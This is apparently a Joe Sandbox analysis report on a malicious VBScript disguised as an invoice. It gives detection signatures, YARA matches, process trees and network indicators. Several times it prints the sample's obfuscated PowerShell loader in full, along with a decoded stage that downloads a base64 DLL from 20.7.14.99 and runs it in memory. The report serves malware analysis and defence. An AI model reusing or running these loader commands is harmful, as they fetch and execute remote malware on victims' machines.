Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref. No INV088002904SINO.vbs

Overview

General Information

Sample Name:Ref. No INV088002904SINO.vbs
Analysis ID:699422
MD5:78f2e521d65cd356494edd52bfa2eb94
SHA1:abd02c0ece3445944708037fcfeffa0f69c14319
SHA256:e844196a40b506f2d00760b7dfcb2474c56f30c705d078cb265b8871aeca8e79
Tags:vbs
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 5184 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4764 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5976INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4919f:$b2: ::FromBase64String(
  • 0x492a3:$b2: ::FromBase64String(
  • 0x4b1eb:$b2: ::FromBase64String(
  • 0x4da51:$b2: ::FromBase64String(
  • 0x4db55:$b2: ::FromBase64String(
  • 0x4e91d:$b2: ::FromBase64String(
  • 0x4efb9:$b2: ::FromBase64String(
  • 0x56507:$b2: ::FromBase64String(
  • 0x8bc5d:$b2: ::FromBase64String(
  • 0x8c192:$b2: ::FromBase64String(
  • 0xbb105:$b2: ::FromBase64String(
  • 0xbb63a:$b2: ::FromBase64String(
  • 0xbc325:$b2: ::FromBase64String(
  • 0xcf517:$b2: ::FromBase64String(
  • 0xd828a:$b2: ::FromBase64String(
  • 0xd8335:$b2: ::FromBase64String(
  • 0xd83ef:$b2: ::FromBase64String(
  • 0xdccf8:$b2: ::FromBase64String(
  • 0x10cd6f:$b2: ::FromBase64String(
  • 0x10d2a4:$b2: ::FromBase64String(
  • 0x113f50:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 4764INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x6959:$b2: ::FromBase64String(
  • 0x6acc:$b2: ::FromBase64String(
  • 0xa744:$b2: ::FromBase64String(
  • 0x10e67:$b2: ::FromBase64String(
  • 0x16af0:$b2: ::FromBase64String(
  • 0x16c63:$b2: ::FromBase64String(
  • 0x36eb9:$b2: ::FromBase64String(
  • 0x36f51:$b2: ::FromBase64String(
  • 0x36fe5:$b2: ::FromBase64String(
  • 0x40c36:$b2: ::FromBase64String(
  • 0x40fd3:$b2: ::FromBase64String(
  • 0x6536c:$b2: ::FromBase64String(
  • 0x67bd3:$b2: ::FromBase64String(
  • 0x9e36b:$b2: ::FromBase64String(
  • 0x134bb6:$b2: ::FromBase64String(
  • 0x13844d:$b2: ::FromBase64String(
  • 0x1385c0:$b2: ::FromBase64String(
  • 0x139391:$b2: ::FromBase64String(
  • 0x17edcc:$b2: ::FromBase64String(
  • 0x17ef41:$b2: ::FromBase64String(
  • 0x17f2a9:$b2: ::FromBase64String(
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Ref. No INV088002904SINO.vbsReversingLabs: Detection: 26%
Source: Ref. No INV088002904SINO.vbsVirustotal: Detection: 13%Perma Link
Source: Ref. No INV088002904SINO.vbsMetadefender: Detection: 20%Perma Link
Source: http://20.7.14.99Avira URL Cloud: Label: malware
Source: http://20.7.14.99/server/dll.txtAvira URL Cloud: Label: malware
Source: http://20.7.14.99Virustotal: Detection: 22%Perma Link
Source: http://20.7.14.99/server/dll.txtVirustotal: Detection: 26%Perma Link
Source: Binary string: dbpdbtem.pdbf source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 70n.pdbM source: powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb/ source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdbM source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb6 source: powershell.exe, 00000003.00000002.343621942.000001B0AB093000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315447170.000001B0AB0F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.344023748.000001B0AB104000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.pdbKj source: powershell.exe, 00000003.00000002.342878874.000001B0AACF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000003.315282709.000001B0AAD3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: global trafficHTTP traffic detected: GET /server/dll.txt HTTP/1.1Host: 20.7.14.99Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 20.7.14.99 20.7.14.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.14.99
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Sep 2022 05:31:10 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Content-Length: 297Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 37 2e 34 2e 32 39 20 53 65 72 76 65 72 20 61 74 20 32 30 2e 37 2e 31 34 2e 39 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Server at 20.7.14.99 Port 80</address></body></html>
Source: powershell.exe, 00000003.00000002.339339189.000001B09412F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.325801923.000001B093624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.7.14.99
Source: powershell.exe, 00000003.00000002.319852310.000001B090AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.7.14.99/server/dll.txt
Source: powershell.exe, 00000001.00000002.355628594.00000216B8620000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.312074067.000001B0AB093000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343700815.000001B0AB0A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.340730750.000001B0A2A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.350622137.00000216A0541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.320814767.000001B092A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.340730750.000001B0A2A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: global trafficHTTP traffic detected: GET /server/dll.txt HTTP/1.1Host: 20.7.14.99Connection: Keep-Alive

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 5976, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4764, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: Process Memory Space: powershell.exe PID: 5976, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4764, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Ref. No INV088002904SINO.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF816391D70
Source: Ref. No INV088002904SINO.vbsReversingLabs: Detection: 26%
Source: Ref. No INV088002904SINO.vbsVirustotal: Detection: 13%
Source: Ref. No INV088002904SINO.vbsMetadefender: Detection: 20%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tigd1obk.kyu.ps1Jump to behavior
Source: classification engineClassification label: mal92.evad.winVBS@6/5@0/1
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: dbpdbtem.pdbf source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 70n.pdbM source: powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb/ source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdbM source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb6 source: powershell.exe, 00000003.00000002.343621942.000001B0AB093000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315447170.000001B0AB0F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.344023748.000001B0AB104000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.pdbKj source: powershell.exe, 00000003.00000002.342878874.000001B0AACF0000.00000004.00000020.00020000.00000000.sdmp
